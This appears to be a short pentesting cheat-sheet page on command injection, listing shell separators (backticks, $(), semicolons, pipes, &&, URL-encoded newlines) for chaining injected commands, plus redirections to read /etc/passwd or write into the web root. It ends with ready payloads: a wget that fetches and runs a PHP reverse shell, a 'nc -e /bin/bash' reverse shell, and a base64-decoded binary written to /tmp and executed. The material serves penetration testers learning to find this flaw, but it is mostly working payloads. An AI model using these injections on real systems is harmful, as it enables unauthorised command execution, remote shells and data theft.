Physical attacks
Mobile Apps Pentesting

Command Injection

If you see that your input could be used to execute any kind of command in the host, you definitely need to test for this vulnerability.

Command Injection/Execution

`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command


vuln= %0a wget -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln= nc -e /bin/bash 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay